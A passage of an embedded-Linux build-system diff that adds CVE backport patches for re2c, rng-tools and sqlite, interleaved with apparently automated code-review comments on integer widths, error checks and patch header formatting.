++ else if (i.toplevel && dist != VARDIST && !history(tag)) {
++ tag.base = base;
++ tag.dist = dist;
++ }
++ else if (i.toplevel) {
++ base = re->tag.idx;
++ dist = 0;
++ }
++ if (trailing(tag)) {
++ dist = 0;
++ }
++ }
++ }
+ }
++
++} // anonymous namespace
+
+-void find_fixed_tags(RESpec &spec)
+-{
+- const bool generic = spec.opts->input_api == INPUT_CUSTOM;
+- std::vector<RE*>::iterator
+- i = spec.res.begin(),
+- e = spec.res.end();
+- for (; i != e; ++i) {
+- size_t base = Tag::RIGHTMOST, dist = 0;
+- find_fixed_tags(*i, spec.tags, dist, base, !generic);
+- }
+-}
++ void find_fixed_tags(RESpec &spec)
++ {
++ std::vector<StackItem> stack;
++ for (std::vector<RE*>::iterator i = spec.res.begin(); i != spec.res.end(); ++i) {
++ find_fixed_tags(spec, stack, *i);
++ }
++ }
+
+-} // namespace re2c
++} // namespace re2c
+\ No newline at end of file
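Review bot: `Tag::VARDIST` narrows from `size_t` to `uint32_t` in tag.cc and tag.h, while `Tag::RIGHTMOST` and `Tag::FICTIVE` stay `size_t` and the `dist` member of `Tag` is not touched by the tag.h section. If `Tag::dist` is still `size_t` in the 1.0.1 tree (not visible here), `tag.dist = dist` widens silently, and any code outside this patch that stores or compares `Tag::VARDIST` in a `size_t` now sees the 32-bit maximum instead of the `size_t` maximum. That is worth confirming, since this is a backport onto an older tree. A comment on the declaration would record the intent, e.g. `// uint32_t to match the distance counter in find_fixed_tags()`. The fixed_tags.cc section also ends without a trailing newline.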
diff --git a/meta/recipes-support/re2c/re2c/CVE-2018-21232-3.patch b/meta/recipes-support/re2c/re2c/CVE-2018-21232-3.patch
new file mode 100644
index 0000000000..f942e21cba
--- /dev/null
+++ b/meta/recipes-support/re2c/re2c/CVE-2018-21232-3.patch
@@ -0,0 +1,156 @@
+From 4d9c809355b574f2a58eac119f5e076c48e4d1e2 Mon Sep 17 00:00:00 2001
+From: Ulya Trofimovich <skvadrik@gmail.com>
+Date: Thu, 23 Apr 2020 22:16:51 +0100
+Subject: [PATCH] Rewrite recursion into iteration (nullable RE).
+
+This is to avoid stack overflow on large RE (especially on instrumented
+builds that have larger stack frames, like AddressSanitizer).
+
+Partial fix for #219 "overflow-1.re test fails on system with small stack".
+
+Upstream-Status: Backport:
+https://github.com/skvadrik/re2c/commit/4d9c809355b574f2a58eac119f5e076c48e4d1e2
+
+CVE: CVE-2018-21232
+
+Signed-off-by: Davide Gardenal <davide.gardenal@huawei.com>
+---
+diff --git a/src/re/nullable.cc b/src/re/nullable.cc
+--- a/src/re/nullable.cc (revision e58939b34bb4c37cd990f82dc286f21cb405743e)
++++ b/src/re/nullable.cc (date 1647253886226)
+@@ -9,43 +9,100 @@
+ #include "src/re/tag.h"
+
+ namespace re2c {
++ namespace {
++
++ struct StackItem {
++ const RE *re; // current sub-RE
++ uint8_t succ; // index of the next sucessor to be visited
++ };
+
+-static bool nullable(const RESpec &spec, const RE *re, bool &trail)
+-{
+- if (trail) return true;
++ static bool nullable(const RESpec &spec, std::vector<StackItem> &stack, const RE *re0)
++ {
++ // the "nullable" status of the last sub-RE visited by DFS
++ bool null = false;
+
+- switch (re->type) {
+- case RE::NIL: return true;
+- case RE::SYM: return false;
+- case RE::ITER:
+- return nullable(spec, re->iter.re, trail);
+- case RE::TAG:
+- trail |= trailing(spec.tags[re->tag.idx]);
+- return true;
+- case RE::ALT:
+- return nullable(spec, re->alt.re1, trail)
+- || nullable(spec, re->alt.re2, trail);
+- case RE::CAT:
+- return nullable(spec, re->cat.re1, trail)
+- && nullable(spec, re->cat.re2, trail);
+- }
+- return false; /* unreachable */
+-}
++ const StackItem i0 = {re0, 0};
++ stack.push_back(i0);
++
++ while (!stack.empty()) {
++ const StackItem i = stack.back();
++ stack.pop_back();
++
++ const RE *re = i.re;
++ if (re->type == RE::NIL) {
++ null = true;
++ }
++ else if (re->type == RE::SYM) {
++ null = false;
++ }
++ else if (re->type == RE::TAG) {
++ null = true;
+
+-/*
+- * warn about rules that match empty string
+- * (including rules with nonempty trailing context)
+- * false positives on partially self-shadowed rules like [^]?
+- */
+-void warn_nullable(const RESpec &spec, const std::string &cond)
+-{
+- const size_t nre = spec.res.size();
+- for (size_t i = 0; i < nre; ++i) {
+- bool trail = false;
+- if (nullable(spec, spec.res[i], trail)) {
+- spec.warn.match_empty_string(spec.rules[i].code->fline, cond);
+- }
+- }
+-}
++ // Trailing context is always in top-level concatenation, and sub-RE
++ // are visited from left to right. Since we are here, sub-RE to the
++ // left of the trailing context is nullable (otherwise we would not
++ // recurse into the right sub-RE), therefore the whole RE is nullable.
++ if (trailing(spec.tags[re->tag.idx])) {
++ //DASSERT(stack.size() == 1 && stack.back().re->type == RE::CAT);
++ stack.pop_back();
++ break;
++ }
++ }
++ else if (re->type == RE::ALT) {
++ if (i.succ == 0) {
++ // recurse into the left sub-RE
++ StackItem k = {re, 1};
++ stack.push_back(k);
++ StackItem j = {re->alt.re1, 0};
++ stack.push_back(j);
++ }
++ else if (!null) {
++ // if the left sub-RE is nullable, so is alternative, so stop
++ // recursion; otherwise recurse into the right sub-RE
++ StackItem j = {re->alt.re2, 0};
++ stack.push_back(j);
++ }
++ }
++ else if (re->type == RE::CAT) {
++ if (i.succ == 0) {
++ // recurse into the left sub-RE
++ StackItem k = {re, 1};
++ stack.push_back(k);
++ StackItem j = {re->cat.re1, 0};
++ stack.push_back(j);
++ }
++ else if (null) {
++ // if the left sub-RE is not nullable, neither is concatenation,
++ // so stop recursion; otherwise recurse into the right sub-RE
++ StackItem j = {re->cat.re2, 0};
++ stack.push_back(j);
++ }
++ }
++ else if (re->type == RE::ITER) {
++ // iteration is nullable if the sub-RE is nullable
++ // (zero repetitions is represented with alternative)
++ StackItem j = {re->iter.re, 0};
++ stack.push_back(j);
++ }
++ }
++
++ //DASSERT(stack.empty());
++ return null;
++ }
++
++ } // anonymous namespace
++
++// Warn about rules that match empty string (including rules with nonempty
++// trailing context). False positives on partially self-shadowed rules like [^]?
++ void warn_nullable(const RESpec &spec, const std::string &cond)
++ {
++ std::vector<StackItem> stack;
++ const size_t nre = spec.res.size();
++ for (size_t i = 0; i < nre; ++i) {
++ if (nullable(spec, stack, spec.res[i])) {
++ spec.warn.match_empty_string(spec.rules[i].code->fline, cond);
++ }
++ }
++ }
+
+ } // namespace re2c
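Review bot: In the `RE::TAG` branch of `nullable()`, `stack.pop_back(); break;` relies on exactly one item being left on the stack, but the `DASSERT` stating that is commented out. If the stack were empty at that point, `pop_back()` on an empty vector is undefined behaviour. If more than one item remained, the leftovers would stay in `stack`, which `warn_nullable()` reuses for the next rule. Using `stack.clear();` before the `break` behaves the same in the expected case and covers both others without the disabled assertion.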
diff --git a/meta/recipes-support/re2c/re2c/CVE-2018-21232-4.patch b/meta/recipes-support/re2c/re2c/CVE-2018-21232-4.patch
new file mode 100644
index 0000000000..ee8d84b1bc
--- /dev/null
+++ b/meta/recipes-support/re2c/re2c/CVE-2018-21232-4.patch
@@ -0,0 +1,166 @@
+From 89be91f3df00657261870adbc590209fdb2bc405 Mon Sep 17 00:00:00 2001
+From: Ulya Trofimovich <skvadrik@gmail.com>
+Date: Thu, 23 Apr 2020 23:02:21 +0100
+Subject: [PATCH] Rewrite recursion into iteration (estimation of NFA size for
+ RE).
+
+This is to avoid stack overflow on large RE (especially on instrumented
+builds that have larger stack frames, like AddressSanitizer).
+
+Partial fix for #219 "overflow-1.re test fails on system with small stack".
+
+Upstram-Status: Backport:
+https://github.com/skvadrik/re2c/commit/89be91f3df00657261870adbc590209fdb2bc405
+
+CVE: CVE-2018-21232
+
+Signed-off-by: Davide Gardenal <davide.gardenal@huawei.com>
+---
+diff --git a/src/nfa/estimate_size.cc b/src/nfa/estimate_size.cc
+--- a/src/nfa/estimate_size.cc (revision e58939b34bb4c37cd990f82dc286f21cb405743e)
++++ b/src/nfa/estimate_size.cc (date 1647005399735)
+@@ -6,41 +6,113 @@
+ #include "src/re/re.h"
+
+ namespace re2c {
++namespace {
++
++struct StackItem {
++ const RE *re; // current sub-RE
++ uint32_t size; // size of the sub-RE (only for alternative and concatenation)
++ uint8_t succ; // index of the next sucessor to be visited
++};
+
+-static size_t estimate(const RE *re)
++static uint32_t estimate_re_size(const RE *re0, std::vector<StackItem> &stack)
+ {
+- switch (re->type) {
+- case RE::NIL: return 0;
+- case RE::SYM: return 1;
+- case RE::TAG: return 1;
+- case RE::ALT:
+- return estimate(re->alt.re1)
+- + estimate(re->alt.re2)
+- + 1;
+- case RE::CAT:
+- return estimate(re->cat.re1)
+- + estimate(re->cat.re2);
+- case RE::ITER: {
+- const size_t
+- iter = estimate(re->iter.re),
+- min = re->iter.min,
+- max = re->iter.max;
+- return max == AST::MANY
+- ? iter * min + 1
+- : iter * max + (max - min);
+- }
+- }
+- return 0; /* unreachable */
+-}
++ // the estimated size of the last sub-RE visited by DFS
++ uint32_t size = 0;
++
++ const StackItem i0 = {re0, 0, 0};
++ stack.push_back(i0);
++
++ while (!stack.empty()) {
++ const StackItem i = stack.back();
++ stack.pop_back();
++
++ const RE *re = i.re;
++ if (re->type == RE::NIL) {
++ size = 0;
++ }
++ else if (re->type == RE::SYM || re->type == RE::TAG) {
++ size = 1;
++ }
++ else if (re->type == RE::ALT) {
++ if (i.succ == 0) {
++ // recurse into the left sub-RE
++ StackItem k = {re, 0, 1};
++ stack.push_back(k);
++ StackItem j = {re->alt.re1, 0, 0};
++ stack.push_back(j);
++ }
++ else if (i.succ == 1) {
++ // recurse into the right sub-RE
++ StackItem k = {re, size, 2};
++ stack.push_back(k);
++ StackItem j = {re->alt.re2, 0, 0};
++ stack.push_back(j);
++ }
++ else {
++ // both sub-RE visited, recursive return
++ size = i.size // left sub-RE (saved on stack)
++ + size // right sub-RE (just visited by DFS)
++ + 1; // additional state for alternative
++ }
++ }
++ else if (re->type == RE::CAT) {
++ if (i.succ == 0) {
++ // recurse into the left sub-RE
++ StackItem k = {re, 0, 1};
++ stack.push_back(k);
++ StackItem j = {re->cat.re1, 0, 0};
++ stack.push_back(j);
++ }
++ else if (i.succ == 1) {
++ // recurse into the right sub-RE
++ StackItem k = {re, size, 2};
++ stack.push_back(k);
++ StackItem j = {re->cat.re2, 0, 0};
++ stack.push_back(j);
++ }
++ else {
++ // both sub-RE visited, recursive return
++ size = i.size // left sub-RE (saved on stack)
++ + size; // right sub-RE (just visited by DFS)
++ }
++ }
++ else if (re->type == RE::ITER) {
++ if (i.succ == 0) {
++ // recurse into the sub-RE
++ StackItem k = {re, 0, 1};
++ stack.push_back(k);
++ StackItem j = {re->iter.re, 0, 0};
++ stack.push_back(j);
++ }
++ else {
++ // sub-RE visited, recursive return
++ const uint32_t min = re->iter.min, max = re->iter.max;
++ size = max == AST::MANY
++ ? size * min + 1
++ : size * max + (max - min);
++ }
++ }
++ }
++
++ //DASSERT(stack.empty());
++ return size;
++}
++
++} // anonymous namespace
+
+ size_t estimate_size(const std::vector<RE*> &res)
+ {
+- const size_t nre = res.size();
+- size_t size = nre - 1;
+- for (size_t i = 0; i < nre; ++i) {
+- size += estimate(res[i]) + 1;
+- }
+- return size;
++ std::vector<StackItem> stack;
++
++ const size_t nre = res.size();
++ //DASSERT(nre > 0);
++ size_t size = nre - 1;
++
++ for (size_t i = 0; i < nre; ++i) {
++ size += estimate_re_size(res[i], stack) + 1;
++ }
++
++ return size;
+ }
+
+ } // namespace re2c
+
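Review bot: `estimate_re_size()` does its arithmetic in `uint32_t` where the removed `estimate()` used `size_t`, so `size * min + 1` and `size * max + (max - min)` in the `RE::ITER` return branch now wrap at 2^32 even on 64-bit hosts. How callers use the result of `estimate_size()` is not visible here; if it sizes an allocation, a wrapped value would be an underestimate. Keeping the pre-patch width is a small change: `size_t size;` in `StackItem`, a `size_t` return type, and `size_t size = 0;` for the accumulator.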
diff --git a/meta/recipes-support/re2c/re2c_1.0.1.bb b/meta/recipes-support/re2c/re2c_1.0.1.bb
index 35200ecde8..ca5c33f151 100644
--- a/meta/recipes-support/re2c/re2c_1.0.1.bb
+++ b/meta/recipes-support/re2c/re2c_1.0.1.bb
@@ -1,11 +1,17 @@
SUMMARY = "Tool for writing very fast and very flexible scanners"
-HOMEPAGE = "http://re2c.sourceforge.net/"
+DESCRIPTION = "A free and open-source lexer generator for C, C++ and Go. It compiles regular expressions to determinisitic finite automata and encodes the automata in the form of a program in the target language. Unlike any other such tool, re2c focuses on generating high efficient code for regular expression matching. As a result this allows a much broader range of use than any traditional lexer."
+HOMEPAGE = "http://re2c.org/"
+BUGTRACKER = "https://github.com/skvadrik/re2c/issues"
AUTHOR = "Marcus Börger <helly@users.sourceforge.net>"
SECTION = "devel"
LICENSE = "PD"
LIC_FILES_CHKSUM = "file://README;beginline=146;md5=881056c9add17f8019ccd8c382ba963a"
-SRC_URI = "https://github.com/skvadrik/re2c/releases/download/${PV}/${BPN}-${PV}.tar.gz"
+SRC_URI = "https://github.com/skvadrik/re2c/releases/download/${PV}/${BPN}-${PV}.tar.gz \
+file://CVE-2018-21232-1.patch \
+file://CVE-2018-21232-2.patch \
+file://CVE-2018-21232-3.patch \
+file://CVE-2018-21232-4.patch"
SRC_URI[md5sum] = "e2c6cf52fc6a21595f21bc82db5324f8"
SRC_URI[sha256sum] = "605058d18a00e01bfc32aebf83af35ed5b13180b4e9f279c90843afab2c66c7c"
UPSTREAM_CHECK_URI = "https://github.com/skvadrik/re2c/releases"
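Review bot: The new `DESCRIPTION` string misspells "deterministic" as "determinisitic", and this text is copied into package metadata. The updated `HOMEPAGE` still uses plain HTTP; if the site serves HTTPS, `HOMEPAGE = "https://re2c.org/"` would be preferable.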
diff --git a/meta/recipes-support/rng-tools/rng-tools/0001-rngd_jitter-fix-O_NONBLOCK-setting-for-entropy-pipe.patch b/meta/recipes-support/rng-tools/rng-tools/0001-rngd_jitter-fix-O_NONBLOCK-setting-for-entropy-pipe.patch
new file mode 100644
index 0000000000..3b44095cf5
--- /dev/null
+++ b/meta/recipes-support/rng-tools/rng-tools/0001-rngd_jitter-fix-O_NONBLOCK-setting-for-entropy-pipe.patch
@@ -0,0 +1,26 @@
+From 6ce86cb5cf06541cd5aad70fe8494b07b22c247e Mon Sep 17 00:00:00 2001
+From: Matthias Schiffer <matthias.schiffer@tq-group.com>
+Date: Wed, 27 Jan 2021 16:10:32 +0100
+Subject: [PATCH] rngd_jitter: fix O_NONBLOCK setting for entropy pipe
+
+A pointer was passed to fcntl instead of the flags variable, setting
+random flags.
+
+Signed-off-by: Matthias Schiffer <matthias.schiffer@tq-group.com>
+---
+ rngd_jitter.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/rngd_jitter.c b/rngd_jitter.c
+index 32bac53..25b3543 100644
+--- a/rngd_jitter.c
++++ b/rngd_jitter.c
+@@ -465,7 +465,7 @@ int init_jitter_entropy_source(struct rng *ent_src)
+
+ flags = fcntl(pipefds[0], F_GETFL, 0);
+ flags |= O_NONBLOCK;
+- fcntl(pipefds[0], F_SETFL, &flags);
++ fcntl(pipefds[0], F_SETFL, flags);
+
+ if (ent_src->rng_options[JITTER_OPT_USE_AES].int_val) {
+ #ifdef HAVE_LIBGCRYPT
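Review bot: The corrected lines still use the result of `fcntl(pipefds[0], F_GETFL, 0)` unchecked. If that call returns -1, `flags |= O_NONBLOCK` stays -1 and the following F_SETFL is issued with every flag bit set, which is close to the garbage-flags problem this patch is meant to remove. A guard such as `if (flags == -1 || fcntl(pipefds[0], F_SETFL, flags | O_NONBLOCK) == -1)` followed by an error return would close it; patch 0002 moves the same three lines and inherits the gap. Separately, none of the three rngd_jitter patch headers (0001 to 0003) carries an `Upstream-Status:` line, unlike the sqlite patches added in this change, so the origin of the backport is not recorded. init_jitter_entropy_source() starts and ends outside the hunk.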
diff --git a/meta/recipes-support/rng-tools/rng-tools/0002-rngd_jitter-initialize-AES-key-before-setting-the-en.patch b/meta/recipes-support/rng-tools/rng-tools/0002-rngd_jitter-initialize-AES-key-before-setting-the-en.patch
new file mode 100644
index 0000000000..34f8227543
--- /dev/null
+++ b/meta/recipes-support/rng-tools/rng-tools/0002-rngd_jitter-initialize-AES-key-before-setting-the-en.patch
@@ -0,0 +1,38 @@
+From 330c2ba14510c8103b30d5021adb18f1534031a1 Mon Sep 17 00:00:00 2001
+From: Matthias Schiffer <matthias.schiffer@tq-group.com>
+Date: Wed, 27 Jan 2021 16:18:09 +0100
+Subject: [PATCH] rngd_jitter: initialize AES key before setting the entropy
+ pipe to O_NONBLOCK
+
+Signed-off-by: Matthias Schiffer <matthias.schiffer@tq-group.com>
+---
+ rngd_jitter.c | 9 +++++----
+ 1 file changed, 5 insertions(+), 4 deletions(-)
+
+diff --git a/rngd_jitter.c b/rngd_jitter.c
+index 25b3543..48f344c 100644
+--- a/rngd_jitter.c
++++ b/rngd_jitter.c
+@@ -463,10 +463,6 @@ int init_jitter_entropy_source(struct rng *ent_src)
+ pthread_mutex_unlock(&tdata[i].statemtx);
+ }
+
+- flags = fcntl(pipefds[0], F_GETFL, 0);
+- flags |= O_NONBLOCK;
+- fcntl(pipefds[0], F_SETFL, flags);
+-
+ if (ent_src->rng_options[JITTER_OPT_USE_AES].int_val) {
+ #ifdef HAVE_LIBGCRYPT
+ /*
+@@ -487,6 +483,11 @@ int init_jitter_entropy_source(struct rng *ent_src)
+ ent_src->rng_options[JITTER_OPT_USE_AES].int_val = 1;
+ }
+ xread_jitter(aes_buf, tdata[0].buf_sz, ent_src);
++
++ flags = fcntl(pipefds[0], F_GETFL, 0);
++ flags |= O_NONBLOCK;
++ fcntl(pipefds[0], F_SETFL, flags);
++
+ #else
+ message_entsrc(ent_src,LOG_CONS|LOG_INFO, "libgcrypt not available. Disabling AES in JITTER source\n");
+ ent_src->rng_options[JITTER_OPT_USE_AES].int_val = 0;
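Review bot: As the second inner hunk reads, the relocated `fcntl` block lands between `xread_jitter(aes_buf, ...)` and `#else`, so O_NONBLOCK would only be applied when AES is enabled and libgcrypt is compiled in. If that is where the lines really sit, a build without libgcrypt or a run with AES disabled leaves the read end of the entropy pipe blocking. Patch 0003 adds an `else` branch whose comment mentions setting O_NONBLOCK, but no `fcntl` call is visible there either. Indentation is lost in this view, so please confirm against the applied source that the three lines end up after `#endif` and the closing brace of the `if`, not inside the `#ifdef HAVE_LIBGCRYPT` arm. The function body continues outside both hunks.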
diff --git a/meta/recipes-support/rng-tools/rng-tools/0003-rngd_jitter-always-read-from-entropy-pipe-before-set.patch b/meta/recipes-support/rng-tools/rng-tools/0003-rngd_jitter-always-read-from-entropy-pipe-before-set.patch
new file mode 100644
index 0000000000..b3bc8028ea
--- /dev/null
+++ b/meta/recipes-support/rng-tools/rng-tools/0003-rngd_jitter-always-read-from-entropy-pipe-before-set.patch
@@ -0,0 +1,38 @@
+From 36bc92ef2789b13183c8895d83665f48b13c2b9e Mon Sep 17 00:00:00 2001
+From: Matthias Schiffer <matthias.schiffer@tq-group.com>
+Date: Wed, 27 Jan 2021 16:22:39 +0100
+Subject: [PATCH] rngd_jitter: always read from entropy pipe before setting
+ O_NONBLOCK
+
+Even with AES disabled, we want to make sure that jent_read_entropy() has
+already generated some entropy before we consider the the source
+initialized. Otherwise "Entropy Generation is slow" log spam will be
+emitteded until this has happened, which can take several seconds.
+
+Signed-off-by: Matthias Schiffer <matthias.schiffer@tq-group.com>
+---
+ rngd_jitter.c | 11 +++++++++++
+ 1 file changed, 11 insertions(+)
+
+diff --git a/rngd_jitter.c b/rngd_jitter.c
+index 48f344c..b736cdd 100644
+--- a/rngd_jitter.c
++++ b/rngd_jitter.c
+@@ -492,6 +492,17 @@ int init_jitter_entropy_source(struct rng *ent_src)
+ message_entsrc(ent_src,LOG_CONS|LOG_INFO, "libgcrypt not available. Disabling AES in JITTER source\n");
+ ent_src->rng_options[JITTER_OPT_USE_AES].int_val = 0;
+ #endif
++ } else {
++ /*
++ * Make sure that an entropy gathering thread has generated
++ * at least some entropy before setting O_NONBLOCK and finishing
++ * the entropy source initialization.
++ *
++ * This avoids "Entropy Generation is slow" log spamming that
++ * would otherwise happen until jent_read_entropy() has run
++ * for the first time.
++ */
++ xread_jitter(&i, 1, ent_src);
+ }
+ message_entsrc(ent_src,LOG_DAEMON|LOG_INFO, "Enabling JITTER rng support\n");
+ return 0;
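Review bot: The priming read `xread_jitter(&i, 1, ent_src);` discards its result, so the code goes on to log "Enabling JITTER rng support" and `return 0` whether or not a byte was actually read. If xread_jitter reports failure through its return value (its definition is not in this hunk), the result should be checked and initialization failed on error, so that a source which produced no entropy is not reported as ready. The call also writes into `i`, which looks like the loop index used earlier in the function; a dedicated `unsigned char` scratch variable would make the intent clearer. The function starts outside the hunk.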
diff --git a/meta/recipes-support/rng-tools/rng-tools/rngd.service b/meta/recipes-support/rng-tools/rng-tools/rngd.service
index aaaaa29074..f296a99e1f 100644
--- a/meta/recipes-support/rng-tools/rng-tools/rngd.service
+++ b/meta/recipes-support/rng-tools/rng-tools/rngd.service
@@ -3,6 +3,7 @@ Description=Hardware RNG Entropy Gatherer Daemon
DefaultDependencies=no
After=systemd-udev-settle.service
Before=sysinit.target shutdown.target
+Wants=systemd-udev-settle.service
Conflicts=shutdown.target
[Service]
diff --git a/meta/recipes-support/rng-tools/rng-tools_6.9.bb b/meta/recipes-support/rng-tools/rng-tools_6.9.bb
index 913342c315..58b58fbb3c 100644
--- a/meta/recipes-support/rng-tools/rng-tools_6.9.bb
+++ b/meta/recipes-support/rng-tools/rng-tools_6.9.bb
@@ -9,7 +9,10 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=b234ee4d69f5fce4486a80fdaf4a4263"
DEPENDS = "sysfsutils"
SRC_URI = "\
- git://github.com/nhorman/rng-tools.git \
+ git://github.com/nhorman/rng-tools.git;branch=master;protocol=https \
+ file://0001-rngd_jitter-fix-O_NONBLOCK-setting-for-entropy-pipe.patch \
+ file://0002-rngd_jitter-initialize-AES-key-before-setting-the-en.patch \
+ file://0003-rngd_jitter-always-read-from-entropy-pipe-before-set.patch \
file://init \
file://default \
file://rngd.service \
diff --git a/meta/recipes-support/serf/serf_1.3.9.bb b/meta/recipes-support/serf/serf_1.3.9.bb
index 6a27f12102..3276d40df6 100644
--- a/meta/recipes-support/serf/serf_1.3.9.bb
+++ b/meta/recipes-support/serf/serf_1.3.9.bb
@@ -1,4 +1,9 @@
SUMMARY = "High-Performance Asynchronous HTTP Client Library"
+DESCRIPTION = "The Apache Serf library is a C-based HTTP client library built upon the Apache \
+Portable Runtime (APR) library. It multiplexes connections, running the \
+read/write communication asynchronously. Memory copies and transformations are \
+kept to a minimum to provide high performance operation."
+HOMEPAGE = "http://serf.apache.org/"
SRC_URI = "${APACHE_MIRROR}/${BPN}/${BPN}-${PV}.tar.bz2 \
file://norpath.patch \
file://env.patch \
@@ -30,4 +35,9 @@ EXTRA_OESCONS = " \
OPENSSL="${STAGING_EXECPREFIXDIR}" \
"
+# scons creates non-reproducible archives
+do_install_append() {
+ rm ${D}/${libdir}/*.a
+}
+
BBCLASSEXTEND = "native nativesdk"
diff --git a/meta/recipes-support/shared-mime-info/shared-mime-info_git.bb b/meta/recipes-support/shared-mime-info/shared-mime-info_git.bb
index 7a060b09ad..05c7d32965 100644
--- a/meta/recipes-support/shared-mime-info/shared-mime-info_git.bb
+++ b/meta/recipes-support/shared-mime-info/shared-mime-info_git.bb
@@ -1,4 +1,5 @@
SUMMARY = "Shared MIME type database and specification"
+DESCRIPTION = "The shared-mime-info package contains the core database of common types and the update-mime-database command used to extend it. It requires glib2 to be installed for building the update command. Additionally, it uses intltool for translations, though this is only a dependency for the maintainers."
HOMEPAGE = "http://freedesktop.org/wiki/Software/shared-mime-info"
SECTION = "base"
@@ -7,7 +8,7 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=b234ee4d69f5fce4486a80fdaf4a4263"
DEPENDS = "libxml2 itstool-native glib-2.0 shared-mime-info-native"
-SRC_URI = "git://gitlab.freedesktop.org/xdg/shared-mime-info.git;protocol=https"
+SRC_URI = "git://gitlab.freedesktop.org/xdg/shared-mime-info.git;protocol=https;branch=master"
SRCREV = "829b26d85e7d89a0caee03046c3bce373f04c80a"
PV = "1.15"
S = "${WORKDIR}/git"
diff --git a/meta/recipes-support/sqlite/files/CVE-2020-35525.patch b/meta/recipes-support/sqlite/files/CVE-2020-35525.patch
new file mode 100644
index 0000000000..27d81d42d9
--- /dev/null
+++ b/meta/recipes-support/sqlite/files/CVE-2020-35525.patch
@@ -0,0 +1,21 @@
+From: drh <drh@noemail.net>
+Date: Thu, 20 Feb 2020 14:08:51 +0000
+Subject: [PATCH] Early-out on the INTERSECT query processing following an
+ error.
+
+Upstream-Status: Backport [http://security.debian.org/debian-security/pool/updates/main/s/sqlite3/sqlite3_3.27.2-3+deb10u2.debian.tar.xz]
+CVE: CVE-2020-35525
+Signed-off-by: Virendra Thakur <virendrak@kpit.com>
+---
+Index: sqlite-autoconf-3310100/sqlite3.c
+===================================================================
+--- sqlite-autoconf-3310100.orig/sqlite3.c
++++ sqlite-autoconf-3310100/sqlite3.c
+@@ -130767,6 +130767,7 @@ static int multiSelect(
+ /* Generate code to take the intersection of the two temporary
+ ** tables.
+ */
++ if( rc ) break;
+ assert( p->pEList );
+ iBreak = sqlite3VdbeMakeLabel(pParse);
+ iCont = sqlite3VdbeMakeLabel(pParse);
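Review bot: The `Upstream-Status: Backport [...]` line cites a Debian security tarball over plain `http://` rather than the SQLite check-in the fix comes from, and the header has no `From <hash>` line. As a result the one-line change `if( rc ) break;` cannot be matched to its upstream commit from this file alone. Pointing the tag at the upstream check-in, in the form `Upstream-Status: Backport [https://sqlite.org/src/info/<check-in-id>]` as CVE-2023-7104.patch does, would make the backport auditable. CVE-2020-35527.patch carries the same Debian reference. multiSelect() starts and ends outside the hunk.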
diff --git a/meta/recipes-support/sqlite/files/CVE-2020-35527.patch b/meta/recipes-support/sqlite/files/CVE-2020-35527.patch
new file mode 100644
index 0000000000..d1dae389b0
--- /dev/null
+++ b/meta/recipes-support/sqlite/files/CVE-2020-35527.patch
@@ -0,0 +1,22 @@
+From: dan <dan@noemail.net>
+Date: Mon, 26 Oct 2020 13:24:36 +0000
+Subject: [PATCH] Fix a problem with ALTER TABLE for views that have a nested
+ FROM clause. Ticket [f50af3e8a565776b].
+
+Upstream-Status: Backport [http://security.debian.org/debian-security/pool/updates/main/s/sqlite3/sqlite3_3.27.2-3+deb10u2.debian.tar.xz]
+CVE: CVE-2020-35527
+Signed-off-by: Virendra Thakur <virendra.thakur@kpit.com>
+---
+Index: sqlite-autoconf-3310100/sqlite3.c
+===================================================================
+--- sqlite-autoconf-3310100.orig/sqlite3.c
++++ sqlite-autoconf-3310100/sqlite3.c
+@@ -133110,7 +133110,7 @@ static int selectExpander(Walker *pWalke
+ pNew = sqlite3ExprListAppend(pParse, pNew, pExpr);
+ sqlite3TokenInit(&sColname, zColname);
+ sqlite3ExprListSetName(pParse, pNew, &sColname, 0);
+- if( pNew && (p->selFlags & SF_NestedFrom)!=0 ){
++ if( pNew && (p->selFlags & SF_NestedFrom)!=0 && !IN_RENAME_OBJECT ){
+ struct ExprList_item *pX = &pNew->a[pNew->nExpr-1];
+ sqlite3DbFree(db, pX->zEName);
+ if( pSub ){
diff --git a/meta/recipes-support/sqlite/files/CVE-2021-20223.patch b/meta/recipes-support/sqlite/files/CVE-2021-20223.patch
new file mode 100644
index 0000000000..e9d2e04d30
--- /dev/null
+++ b/meta/recipes-support/sqlite/files/CVE-2021-20223.patch
@@ -0,0 +1,23 @@
+From d1d43efa4fb0f2098c0e2c5bf2e807c58d5ec05b Mon Sep 17 00:00:00 2001
+From: dan <dan@noemail.net>
+Date: Mon, 26 Oct 2020 13:24:36 +0000
+Subject: [PATCH] Prevent fts5 tokenizer unicode61 from considering '\0' to be
+ a token characters, even if other characters of class "Cc" are.
+
+FossilOrigin-Name: b7b7bde9b7a03665e3691c6d51118965f216d2dfb1617f138b9f9e60e418ed2f
+
+CVE: CVE-2021-20223
+Upstream-Status: Backport [https://github.com/sqlite/sqlite/commit/d1d43efa4fb0f2098c0e2c5bf2e807c58d5ec05b.patch]
+Comment: Removed manifest, manifest.uuid and fts5tok1.test as these files are not present in the amalgamated source code
+Signed-Off-by: Sana.Kazi@kpit.com
+---
+--- a/sqlite3.c 2022-09-09 13:54:30.010768197 +0530
++++ b/sqlite3.c 2022-09-09 13:56:25.458769142 +0530
+@@ -227114,6 +227114,7 @@
+ }
+ iTbl++;
+ }
++ aAscii[0] = 0; /* 0x00 is never a token character */
+ }
+
+ /*
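Review bot: The trailer `Signed-Off-by: Sana.Kazi@kpit.com` does not follow the `Signed-off-by: Name <address>` form used by the other patches in this change, and trailer-parsing tools may not recognise it. It should read `Signed-off-by: Sana Kazi <Sana.Kazi@kpit.com>`. The `Date:` line is also identical to the one in CVE-2020-35527.patch (Mon, 26 Oct 2020 13:24:36 +0000), which suggests the header was copied; it is worth checking against the commit named in the `From` line. The function that receives the added `aAscii[0] = 0;` starts outside the hunk.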
diff --git a/meta/recipes-support/sqlite/files/CVE-2022-35737.patch b/meta/recipes-support/sqlite/files/CVE-2022-35737.patch
new file mode 100644
index 0000000000..341e002913
--- /dev/null
+++ b/meta/recipes-support/sqlite/files/CVE-2022-35737.patch
@@ -0,0 +1,29 @@
+From 2bbf4c999dbb4b520561a57e0bafc19a15562093 Mon Sep 17 00:00:00 2001
+From: Hitendra Prajapati <hprajapati@mvista.com>
+Date: Fri, 2 Sep 2022 11:22:29 +0530
+Subject: [PATCH] CVE-2022-35737
+
+Upstream-Status: Backport [https://www.sqlite.org/src/info/aab790a16e1bdff7]
+CVE: CVE-2022-35737
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
